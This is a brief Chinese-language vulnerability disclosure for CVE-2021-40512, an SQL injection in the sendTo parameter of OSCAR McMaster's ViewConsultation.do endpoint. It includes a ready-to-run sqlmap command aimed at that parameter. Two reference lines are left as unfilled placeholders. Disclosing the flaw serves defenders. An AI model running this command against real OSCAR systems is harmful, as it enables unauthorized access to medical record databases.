
CVE-2021-40512 OSCAR McMaster 19.40~1235 SQL Injection Vulnerability.
OSCAR McMaster 19.40~1235 版本中存在一个 SQL 注入漏洞。恶意攻击者可以通过位于 /oscar/oscarEncounter/ViewConsultation.do 端点上的易受攻击的 sendTo 参数向 MySQL/MariaDB 数据库发送 SQL 命令。
[Placeholder for cve.mitre]
[Placeholder for nist]
易受攻击的 JSP 页面:
ViewConsultation.do - sendTo 参数
易受攻击的 Payload:
sqlmap -u "/oscar/oscarEncounter/ViewConsultation.do?sendTo=&startDate=&endDate=&searchDate=0¤tTeam=&orderby=2&desc=0&offset=&limit=100&mrpNo=&patientId=&serviceFilter=&consultantFilter=&urgencyFilter=" --cookie=<COOKIE> -p sendTo --banner
由 Jack McBride 于 2021 年 8 月发现